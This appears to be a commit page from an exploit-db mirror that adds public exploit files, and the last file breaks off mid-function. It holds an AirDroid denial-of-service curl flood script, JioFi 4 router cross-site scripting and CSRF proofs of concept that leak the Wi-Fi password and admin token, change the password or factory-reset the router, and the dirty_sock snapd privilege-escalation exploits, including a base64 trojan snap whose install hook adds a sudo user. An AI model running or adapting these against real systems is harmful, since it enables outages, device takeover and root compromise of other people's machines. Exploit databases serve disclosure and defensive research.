bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-02-14

Browse source 
11 changes to exploits/shellcodes

AirDroid 4.2.1.6 - Denial of Service

NetworkSleuth 3.0 - 'Name' Denial of Service (PoC)
runc< 1.0-rc6 (Docker < 18.09.2) - Host Command Execution
Ubuntu snapd < 2.37.1 - Local Privilege Escalation
runc < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)

Netatalk < 3.1.12 - Authentication Bypass
Netatalk 3.1.12 - Authentication Bypass
Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting
Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure)
Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure)
Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting
PilusCart 1.4.1 - 'send' SQL Injection
This commit is contained in:
Offensive Security 2019-02-14 05:01:54 +00:00
parent 1982f33252
commit a4b18dada5
11 changed files with 906 additions and 85 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

42
exploits/android/dos/46337.sh Executable file
View file

@ -0,0 +1,42 @@
#!/bin/bash
# *********************************************************************
# * Author: Marcelo Vázquez (aka s4vitar) *
# * AirDroid Denial of Service (DoS) & System Crash + Forced Reboot *
# *********************************************************************
# Exploit Title: AirDroid Remote Denial of Service (DoS) & System Crash + Forced Reboot
# Date: 2019-02-13
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Collaborators: Victor Lasa (aka vowkin)
# Vendor Homepage: https://web.airdroid.com/
# Software Link: https://play.google.com/store/apps/details?id=com.sand.airdroid&hl=en
# Version: <= AirDroid 4.2.1.6
# Tested on: Android
url=$1 # Example: http://192.168.1.46:8888
requests=0
trap ctrl_c INT
# If Ctrl+C key is pressed then the threads are killed
function ctrl_c() {
echo -e "\n\n[*]Exiting...\n" && tput cnorm
pkill curl > /dev/null 2>&1
exit
}
# Detect number of arguments being passed to the program
if [ "$(echo $#)" == "1" ]; then
# Infinite Loop
tput cnorm && while true; do
# We send 10000 requests in thread
for i in $(seq 1 10000); do
curl --silent "$url/sdctl/comm/lite_auth/" &
let requests+=1
done && wait # Here we wait for the threads to finish
echo "Requests Sent: $requests"
done
else
echo -e "\nUsage: ./AirDroid_request.sh http://ip:port\n"
fi

33
exploits/hardware/webapps/46363.txt Normal file
View file

@ -0,0 +1,33 @@
# Exploit Title: Jiofi 4 (JMR 1140) Reflected Cross Site Scripting
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact:https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7687
Description:
cgi-bin/qcmap_web_cgi on JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices has POST based reflected XSS via the Page parameter. No sanitization is performed for user input data.
1. Create a poc.html and insert
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="Page" value="GetDeviceDetailsyfc7b<script>alert&#40;document.domain&#41;<&#47;script>pyk0j" />
<input type="hidden" name="mask" value="0" />
<input type="hidden" name="token" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>d
</html>
2. Send to victim(who is connected to the wifi network).
3. Post based Xss gets fired .
Exploit working in firefox quantum ,firefox dev edition etc. Chrome XSS auditor blocks this POC.

41
exploits/hardware/webapps/46364.txt Normal file
View file

@ -0,0 +1,41 @@
# Exploit Title: Jiofi 4 (JMR 1140) CSRF To View Wi-fi Password
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact:https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7745
Description:
JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain the Wi-Fi password by making a cgi-in/qcmap_web_cgi Page=GetWiFi_Setting request and then reading the wpa_security_key field.
POC-
1. Create a view.html and insert
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="Page" value="GetWiFi&#95;Setting" />
<input type="hidden" name="Mask" value="0" />
<input type="hidden" name="result" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. Send to victim(who is connected to the wifi network).
3. The response gives the current wifi password.
Example response-
{"Page":"GetWiFi_Setting","Mask":"0","result":"SUCCESS","ssid":"JioFi4_08FE5F","mode_802_11":"11bgn","tx_power":"MID",
"wmm":"Enable","wps_enable":"PushButton","wifi_security":"WPA2PSK","wpa_encryption_type":"AES",
"wpa_security_key":"leakedpassword",".....etc}
Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this.

90
exploits/hardware/webapps/46365.txt Normal file
View file

@ -0,0 +1,90 @@
# Exploit Title: Jiofi 4 (JMR 1140) CSRF To Leak Admin Tokens to change wifi Password or Factory Reset Router
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact:https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7746
Description:
JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain an admin token by making a /cgi-bin/qcmap_auth type=getuser request and then reading the token field. This token value can then be used to change the Wi-Fi password or perform a factory reset.
POC-
The exploit requires two csrf requests to be sent to the victim(logged to the web interface) connected to the Jiofi router.
1. First get admin tokens
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_auth" method="POST">
<input type="hidden" name="type" value="getuser" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Example response-
{"super_user_id":"administrator", "oper_user_id":"operator", "end_user_id":"admin", "token":"leakedtokens"}
Choice A)Change wifi password to attacker's choice of the Jiofi 4(JMR 1140) router.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="Page" value="SetWiFi&#95;Setting" />
<input type="hidden" name="Mask" value="0" />
<input type="hidden" name="result" value="0" />
<input type="hidden" name="ssid" value="JioFi4&#95;08FE5F" />
<input type="hidden" name="mode&#95;802&#95;11" value="11bgn" />
<input type="hidden" name="tx&#95;power" value="HIGH" />
<input type="hidden" name="wmm" value="Enable" />
<input type="hidden" name="wps&#95;enable" value="PushButton" />
<input type="hidden" name="wifi&#95;security" value="WPA2PSK" />
<input type="hidden" name="wpa&#95;encryption&#95;type" value="AES" />
<input type="hidden" name="wpa&#95;security&#95;key" value="Iamhacked" />
<input type="hidden" name="wep&#95;security&#95;key&#95;1" value="0" />
<input type="hidden" name="wep&#95;security&#95;key&#95;2" value="0" />
<input type="hidden" name="wep&#95;security&#95;key&#95;3" value="0" />
<input type="hidden" name="wep&#95;security&#95;key&#95;4" value="0" />
<input type="hidden" name="wep&#95;current&#95;default&#95;key" value="0" />
<input type="hidden" name="channel&#95;mode" value="automatic" />
<input type="hidden" name="channel&#95;selection" value="11" />
<input type="hidden" name="sleep&#95;mode" value="Enable" />
<input type="hidden" name="sleep&#95;mode&#95;timer" value="30" />
<input type="hidden" name="ssid&#95;broadcast" value="Enable" />
<input type="hidden" name="enable&#95;wifi" value="Enable" />
<input type="hidden" name="token" value="leakedtokens" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Wifi Password changed to Iamhacked
Choice B) Perform Remote Factory Reset
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="type" value="FRST&#95;REAL" />
<input type="hidden" name="token" value="leakedtokens" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
The router reboots to default settings.
Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this.

82
exploits/linux/local/46360.md
View file

@ -1,82 +0,0 @@
# dirty_sock: Privilege Escalation in Ubuntu (via snapd)
In January 2019, current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC, which is being made available for research and education. For a detailed walkthrough of the vulnerability and the exploit, please refer to the <a href="https://initblog.com/2019/dirty-sock/" target="_blank"> blog posting here</a>.
You can easily check if your system is vulnerable. Run the command below. If your `snapd` is 2.37.1 or newer, you are safe.
```
$ snap version
...
snapd 2.37.1
...
```
# Usage
## Version One (use in most cases)
This exploit bypasses access control checks to use a restricted API function (POST /v2/create-user) of the local snapd service. This queries the Ubuntu SSO for a username and public SSH key of a provided email address, and then creates a local user based on these value.
Successful exploitation for this version requires an outbound Internet connection and an SSH service accessible via localhost.
To exploit, first create an account at the <a href="https://login.ubuntu.com/" target="_blank">Ubuntu SSO</a>. After confirming it, edit your profile and upload an SSH public key. Then, run the exploit like this (with the SSH private key corresponding to public key you uploaded):
```
python3 ./dirty_sockv1.py -u "you@yourmail.com" -k "id_rsa"
[+] Slipped dirty sock on random socket file: /tmp/ktgolhtvdk;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Sending payload...
[+] Success! Enjoy your new account with sudo rights!
[Script will automatically ssh to localhost with the SSH key here]
```
## Version Two (use in special cases)
This exploit bypasses access control checks to use a restricted API function (POST /v2/snaps) of the local snapd service. This allows the installation of arbitrary snaps. Snaps in "devmode" bypass the sandbox and may include an "install hook" that is run in the context of root at install time.
dirty_sockv2 leverages the vulnerability to install an empty "devmode" snap including a hook that adds a new user to the local system. This user will have permissions to execute sudo commands.
As opposed to version one, this does not require the SSH service to be running. It will also work on newer versions of Ubuntu with no Internet connection at all, making it resilient to changes and effective in restricted environments.
This exploit should also be effective on non-Ubuntu systems that have installed snapd but that do not support the "create-user" API due to incompatible Linux shell syntax.
Some older Ubuntu systems (like 16.04) may not have the snapd components installed that are required for sideloading. If this is the case, this version of the exploit may trigger it to install those dependencies. During that installation, snapd may upgrade itself to a non-vulnerable version. Testing shows that the exploit is still successful in this scenario. See the troubleshooting section for more details.
To exploit, simply run the script with no arguments on a vulnerable system.
```
python3 ./dirty_sockv2.py
[+] Slipped dirty sock on random socket file: /tmp/gytwczalgx;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Deleting trojan snap (and sleeping 5 seconds)...
[+] Installing the trojan snap (and sleeping 8 seconds)...
[+] Deleting trojan snap (and sleeping 5 seconds)...
********************
Success! You can now `su` to the following account and use sudo:
username: dirty_sock
password: dirty_sock
********************
```
# Troubleshooting
If using version two, and the exploit completes but you don't see your new account, this may be due to some background snap updates. You can view these by executing `snap changes` and then `snap change #`, referencing the line showing the install of the dirty_sock snap. Eventually, these should complete and your account should be usable.
Version 1 seems to be the easiest and fastest, if your environment supports it (SSH service running and accessible from localhost).
Please open issues for anything weird.
# Disclosure Info
The issue was reported directly to the snapd team via Ubuntu's bug tracker. You can read the full thread <a href="https://bugs.launchpad.net/snapd/+bug/1813365" target="_blank">here</a>.
I was very impressed with Canonical's response to this issue. The team was awesome to work with, and overall the experience makes me feel very good about being an Ubuntu user myself.
Public advisory links:
- https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SnapSocketParsing
- https://usn.ubuntu.com/3887-1/
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46360.zip

255
exploits/linux/local/46361.py Executable file
View file

@ -0,0 +1,255 @@
#!/usr/bin/env python3
"""
# dirty_sock: Privilege Escalation in Ubuntu (via snapd)
In January 2019, current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC, which is being made available for research and education. For a detailed walkthrough of the vulnerability and the exploit, please refer to the <a href="https://initblog.com/2019/dirty-sock/" target="_blank"> blog posting here</a>.
You can easily check if your system is vulnerable. Run the command below. If your `snapd` is 2.37.1 or newer, you are safe.
```
$ snap version
...
snapd 2.37.1
...
```
# Usage
## Version One (use in most cases)
This exploit bypasses access control checks to use a restricted API function (POST /v2/create-user) of the local snapd service. This queries the Ubuntu SSO for a username and public SSH key of a provided email address, and then creates a local user based on these value.
Successful exploitation for this version requires an outbound Internet connection and an SSH service accessible via localhost.
To exploit, first create an account at the <a href="https://login.ubuntu.com/" target="_blank">Ubuntu SSO</a>. After confirming it, edit your profile and upload an SSH public key. Then, run the exploit like this (with the SSH private key corresponding to public key you uploaded):
```
python3 ./dirty_sockv1.py -u "you@yourmail.com" -k "id_rsa"
[+] Slipped dirty sock on random socket file: /tmp/ktgolhtvdk;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Sending payload...
[+] Success! Enjoy your new account with sudo rights!
[Script will automatically ssh to localhost with the SSH key here]
```
## Version Two (use in special cases)
This exploit bypasses access control checks to use a restricted API function (POST /v2/snaps) of the local snapd service. This allows the installation of arbitrary snaps. Snaps in "devmode" bypass the sandbox and may include an "install hook" that is run in the context of root at install time.
dirty_sockv2 leverages the vulnerability to install an empty "devmode" snap including a hook that adds a new user to the local system. This user will have permissions to execute sudo commands.
As opposed to version one, this does not require the SSH service to be running. It will also work on newer versions of Ubuntu with no Internet connection at all, making it resilient to changes and effective in restricted environments.
This exploit should also be effective on non-Ubuntu systems that have installed snapd but that do not support the "create-user" API due to incompatible Linux shell syntax.
Some older Ubuntu systems (like 16.04) may not have the snapd components installed that are required for sideloading. If this is the case, this version of the exploit may trigger it to install those dependencies. During that installation, snapd may upgrade itself to a non-vulnerable version. Testing shows that the exploit is still successful in this scenario. See the troubleshooting section for more details.
To exploit, simply run the script with no arguments on a vulnerable system.
```
python3 ./dirty_sockv2.py
[+] Slipped dirty sock on random socket file: /tmp/gytwczalgx;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Deleting trojan snap (and sleeping 5 seconds)...
[+] Installing the trojan snap (and sleeping 8 seconds)...
[+] Deleting trojan snap (and sleeping 5 seconds)...
********************
Success! You can now `su` to the following account and use sudo:
username: dirty_sock
password: dirty_sock
********************
```
# Troubleshooting
If using version two, and the exploit completes but you don't see your new account, this may be due to some background snap updates. You can view these by executing `snap changes` and then `snap change #`, referencing the line showing the install of the dirty_sock snap. Eventually, these should complete and your account should be usable.
Version 1 seems to be the easiest and fastest, if your environment supports it (SSH service running and accessible from localhost).
Please open issues for anything weird.
# Disclosure Info
The issue was reported directly to the snapd team via Ubuntu's bug tracker. You can read the full thread <a href="https://bugs.launchpad.net/snapd/+bug/1813365" target="_blank">here</a>.
I was very impressed with Canonical's response to this issue. The team was awesome to work with, and overall the experience makes me feel very good about being an Ubuntu user myself.
Public advisory links:
- https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SnapSocketParsing
- https://usn.ubuntu.com/3887-1/
Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46361.zip
"""
"""
Local privilege escalation via snapd, affecting Ubuntu and others.
v1 of dirty_sock leverages the /v2/create-user API to create a new local user
based on information in an Ubuntu SSO profile. It requires outbound Internet
access as well as the SSH service running and available from localhost.
Try v2 in more restricted environments, but use v1 when possible.
Before running v1, you need to:
- Create an Ubuntu SSO account (https://login.ubuntu.com/)
- Login to that account and ensure you have your public SSH key configured
in your profile.
Run exploit like this:
dirty_sock.py -u <account email> -k <ssh priv key file>
A new local user with sudo rights will be created using the username from your
Ubuntu SSO profile. The SSH public key will be copied into this users profile.
The exploit will automatically SSH into localhost when finished.
Research and POC by initstring (https://github.com/initstring/dirty_sock)
"""
import argparse
import string
import random
import socket
import re
import sys
import os
BANNER = r'''
___ _ ____ ___ _ _ ____ ____ ____ _ _
| \ | |__/ | \_/ [__ | | | |_/
|__/ | | \ | | ___ ___] |__| |___ | \_
(version 1)
//=========[]==========================================\\
|| R&D || initstring (@init_string) ||
|| Source || https://github.com/initstring/dirty_sock ||
|| Details || https://initblog.com/2019/dirty-sock ||
\\=========[]==========================================//
'''
def process_args():
"""Handles user-passed parameters"""
parser = argparse.ArgumentParser()
parser.add_argument('--username', '-u', type=str, action='store',
required=True, help='Your Ubuntu One account email.')
parser.add_argument('--key', '-k', type=str, action='store',
required=True, help='Full path to the ssh privkey'
' matching the pubkey in your Ubuntu One account.')
args = parser.parse_args()
if not os.path.isfile(args.key):
print("[!] That key file does not exist. Please try again.")
sys.exit()
return args
def create_sockfile():
"""Generates a random socket file name to use"""
alphabet = string.ascii_lowercase
random_string = ''.join(random.choice(alphabet) for i in range(10))
dirty_sock = ';uid=0;'
# This is where we slip on the dirty sock. This makes its way into the
# UNIX AF_SOCKET's peer data, which is parsed in an insecure fashion
# by snapd's ucrednet.go file, allowing us to overwrite the UID variable.
sockfile = '/tmp/' + random_string + dirty_sock
print("[+] Slipped dirty sock on random socket file: " + sockfile)
return sockfile
def bind_sock(sockfile):
"""Binds to a local file"""
# This exploit only works if we also BIND to the socket after creating
# it, as we need to inject the dirty sock as a remote peer in the
# socket's ancillary data.
print("[+] Binding to socket file...")
client_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
client_sock.bind(sockfile)
# Connect to the snap daemon
print("[+] Connecting to snapd API...")
client_sock.connect('/run/snapd.socket')
return client_sock
def add_user(args, client_sock):
"""Main exploit function"""
post_payload = ('{"email": "' + args.username +
'", "sudoer": true, "force-managed": true}')
http_req = ('POST /v2/create-user HTTP/1.1\r\n'
'Host: localhost\r\n'
'Content-Length: ' + str(len(post_payload)) + '\r\n\r\n'
+ post_payload)
# Send our payload to the snap API
print("[+] Sending payload...")
client_sock.sendall(http_req.encode("utf-8"))
# Receive the data and extract the JSON
http_reply = client_sock.recv(8192).decode("utf-8")
# Try to extract a username from the valid reply
regex = re.compile(r'"status":"OK","result":{"username":"(.*?)"')
username = re.findall(regex, http_reply)
# If exploit was not successful, give details and exit
if '"status":"Unauthorized"' in http_reply:
print("[!] System may not be vulnerable, here is the API reply:\n\n")
print(http_reply)
sys.exit()
if 'cannot find user' in http_reply:
print("[!] Could not find user in the snap store... did you follow"
" the instructions?")
print("Here is the API reply:")
print(http_reply)
sys.exit()
if not username:
print("[!] Something went wrong... Here is the API reply:")
print(http_reply)
sys.exit()
# SSH into localhost with our new root account
print("[+] Success! Enjoy your new account with sudo rights!")
cmd1 = 'chmod 600 ' + args.key
cmd2 = 'ssh ' + username[0] + '@localhost -i ' + args.key
os.system(cmd1)
os.system(cmd2)
print("[+] Hope you enjoyed your stay!")
sys.exit()
def main():
"""Main program function"""
# Gotta have a banner...
print(BANNER)
# Process the required arguments
args = process_args()
# Create a random name for the dirty socket file
sockfile = create_sockfile()
# Bind the dirty socket to the snapdapi
client_sock = bind_sock(sockfile)
# Exploit away...
add_user(args, client_sock)
# Remove the dirty socket file
os.remove(sockfile)
if __name__ == '__main__':
main()

330
exploits/linux/local/46362.py Executable file
View file

@ -0,0 +1,330 @@
#!/usr/bin/env python3
"""
# dirty_sock: Privilege Escalation in Ubuntu (via snapd)
In January 2019, current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC, which is being made available for research and education. For a detailed walkthrough of the vulnerability and the exploit, please refer to the <a href="https://initblog.com/2019/dirty-sock/" target="_blank"> blog posting here</a>.
You can easily check if your system is vulnerable. Run the command below. If your `snapd` is 2.37.1 or newer, you are safe.
```
$ snap version
...
snapd 2.37.1
...
```
# Usage
## Version One (use in most cases)
This exploit bypasses access control checks to use a restricted API function (POST /v2/create-user) of the local snapd service. This queries the Ubuntu SSO for a username and public SSH key of a provided email address, and then creates a local user based on these value.
Successful exploitation for this version requires an outbound Internet connection and an SSH service accessible via localhost.
To exploit, first create an account at the <a href="https://login.ubuntu.com/" target="_blank">Ubuntu SSO</a>. After confirming it, edit your profile and upload an SSH public key. Then, run the exploit like this (with the SSH private key corresponding to public key you uploaded):
```
python3 ./dirty_sockv1.py -u "you@yourmail.com" -k "id_rsa"
[+] Slipped dirty sock on random socket file: /tmp/ktgolhtvdk;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Sending payload...
[+] Success! Enjoy your new account with sudo rights!
[Script will automatically ssh to localhost with the SSH key here]
```
## Version Two (use in special cases)
This exploit bypasses access control checks to use a restricted API function (POST /v2/snaps) of the local snapd service. This allows the installation of arbitrary snaps. Snaps in "devmode" bypass the sandbox and may include an "install hook" that is run in the context of root at install time.
dirty_sockv2 leverages the vulnerability to install an empty "devmode" snap including a hook that adds a new user to the local system. This user will have permissions to execute sudo commands.
As opposed to version one, this does not require the SSH service to be running. It will also work on newer versions of Ubuntu with no Internet connection at all, making it resilient to changes and effective in restricted environments.
This exploit should also be effective on non-Ubuntu systems that have installed snapd but that do not support the "create-user" API due to incompatible Linux shell syntax.
Some older Ubuntu systems (like 16.04) may not have the snapd components installed that are required for sideloading. If this is the case, this version of the exploit may trigger it to install those dependencies. During that installation, snapd may upgrade itself to a non-vulnerable version. Testing shows that the exploit is still successful in this scenario. See the troubleshooting section for more details.
To exploit, simply run the script with no arguments on a vulnerable system.
```
python3 ./dirty_sockv2.py
[+] Slipped dirty sock on random socket file: /tmp/gytwczalgx;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Deleting trojan snap (and sleeping 5 seconds)...
[+] Installing the trojan snap (and sleeping 8 seconds)...
[+] Deleting trojan snap (and sleeping 5 seconds)...
********************
Success! You can now `su` to the following account and use sudo:
username: dirty_sock
password: dirty_sock
********************
```
# Troubleshooting
If using version two, and the exploit completes but you don't see your new account, this may be due to some background snap updates. You can view these by executing `snap changes` and then `snap change #`, referencing the line showing the install of the dirty_sock snap. Eventually, these should complete and your account should be usable.
Version 1 seems to be the easiest and fastest, if your environment supports it (SSH service running and accessible from localhost).
Please open issues for anything weird.
# Disclosure Info
The issue was reported directly to the snapd team via Ubuntu's bug tracker. You can read the full thread <a href="https://bugs.launchpad.net/snapd/+bug/1813365" target="_blank">here</a>.
I was very impressed with Canonical's response to this issue. The team was awesome to work with, and overall the experience makes me feel very good about being an Ubuntu user myself.
Public advisory links:
- https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SnapSocketParsing
- https://usn.ubuntu.com/3887-1/
Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46361.zip
"""
"""
Local privilege escalation via snapd, affecting Ubuntu and others.
v2 of dirty_sock leverages the /v2/snaps API to sideload an empty snap
with an install hook that creates a new user.
v1 is recommended is most situations as it is less intrusive.
Simply run as is, no arguments, no requirements. If the exploit is successful,
the system will have a new user with sudo permissions as follows:
username: dirty_sock
password: dirty_sock
You can execute su dirty_sock when the exploit is complete. See the github page
for troubleshooting.
Research and POC by initstring (https://github.com/initstring/dirty_sock)
"""
import string
import random
import socket
import base64
import time
import sys
import os
BANNER = r'''
___ _ ____ ___ _ _ ____ ____ ____ _ _
| \ | |__/ | \_/ [__ | | | |_/
|__/ | | \ | | ___ ___] |__| |___ | \_
(version 2)
//=========[]==========================================\\
|| R&D || initstring (@init_string) ||
|| Source || https://github.com/initstring/dirty_sock ||
|| Details || https://initblog.com/2019/dirty-sock ||
\\=========[]==========================================//
'''
# The following global is a base64 encoded string representing an installable
# snap package. The snap itself is empty and has no functionality. It does,
# however, have a bash-script in the install hook that will create a new user.
# For full details, read the blog linked on the github page above.
TROJAN_SNAP = ('''
aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD/
/////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJh
ZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5
TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERo
T2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawpl
Y2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFt
ZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZv
ciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5n
L2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZt
b2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAe
rFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUj
rkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAA
AAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2
XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5
RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAA
AFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw'''
+ 'A' * 4256 + '==')
def check_args():
"""Return short help if any args given"""
if len(sys.argv) > 1:
print("\n\n"
"No arguments needed for this version. Simply run and enjoy."
"\n\n")
sys.exit()
def create_sockfile():
"""Generates a random socket file name to use"""
alphabet = string.ascii_lowercase
random_string = ''.join(random.choice(alphabet) for i in range(10))
dirty_sock = ';uid=0;'
# This is where we slip on the dirty sock. This makes its way into the
# UNIX AF_SOCKET's peer data, which is parsed in an insecure fashion
# by snapd's ucrednet.go file, allowing us to overwrite the UID variable.
sockfile = '/tmp/' + random_string + dirty_sock
print("[+] Slipped dirty sock on random socket file: " + sockfile)
return sockfile
def bind_sock(sockfile):
"""Binds to a local file"""
# This exploit only works if we also BIND to the socket after creating
# it, as we need to inject the dirty sock as a remote peer in the
# socket's ancillary data.
print("[+] Binding to socket file...")
client_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
client_sock.bind(sockfile)
# Connect to the snap daemon
print("[+] Connecting to snapd API...")
client_sock.connect('/run/snapd.socket')
return client_sock
def delete_snap(client_sock):
"""Deletes the trojan snap, if installed"""
post_payload = ('{"action": "remove",'
' "snaps": ["dirty-sock"]}')
http_req = ('POST /v2/snaps HTTP/1.1\r\n'
'Host: localhost\r\n'
'Content-Type: application/json\r\n'
'Content-Length: ' + str(len(post_payload)) + '\r\n\r\n'
+ post_payload)
# Send our payload to the snap API
print("[+] Deleting trojan snap (and sleeping 5 seconds)...")
client_sock.sendall(http_req.encode("utf-8"))
# Receive the data and extract the JSON
http_reply = client_sock.recv(8192).decode("utf-8")
# Exit on probably-not-vulnerable
if '"status":"Unauthorized"' in http_reply:
print("[!] System may not be vulnerable, here is the API reply:\n\n")
print(http_reply)
sys.exit()
# Exit on failure
if 'status-code":202' not in http_reply:
print("[!] Did not work, here is the API reply:\n\n")
print(http_reply)
sys.exit()
# We sleep to allow the API command to complete, otherwise the install
# may fail.
time.sleep(5)
def install_snap(client_sock):
"""Sideloads the trojan snap"""
# Decode the base64 from above back into bytes
blob = base64.b64decode(TROJAN_SNAP)
# Configure the multi-part form upload boundary here:
boundary = '------------------------f8c156143a1caf97'
# Construct the POST payload for the /v2/snap API, per the instructions
# here: https://github.com/snapcore/snapd/wiki/REST-API
# This follows the 'sideloading' process.
post_payload = '''
--------------------------f8c156143a1caf97
Content-Disposition: form-data; name="devmode"
true
--------------------------f8c156143a1caf97
Content-Disposition: form-data; name="snap"; filename="snap.snap"
Content-Type: application/octet-stream
''' + blob.decode('latin-1') + '''
--------------------------f8c156143a1caf97--'''
# Multi-part forum uploads are weird. First, we post the headers
# and wait for an HTTP 100 reply. THEN we can send the payload.
http_req1 = ('POST /v2/snaps HTTP/1.1\r\n'
'Host: localhost\r\n'
'Content-Type: multipart/form-data; boundary='
+ boundary + '\r\n'
'Expect: 100-continue\r\n'
'Content-Length: ' + str(len(post_payload)) + '\r\n\r\n')
# Send the headers to the snap API
print("[+] Installing the trojan snap (and sleeping 8 seconds)...")
client_sock.sendall(http_req1.encode("utf-8"))
# Receive the initial HTTP/1.1 100 Continue reply
http_reply = client_sock.recv(8192).decode("utf-8")
if 'HTTP/1.1 100 Continue' not in http_reply:
print("[!] Error starting POST conversation, here is the reply:\n\n")
print(http_reply)
sys.exit()
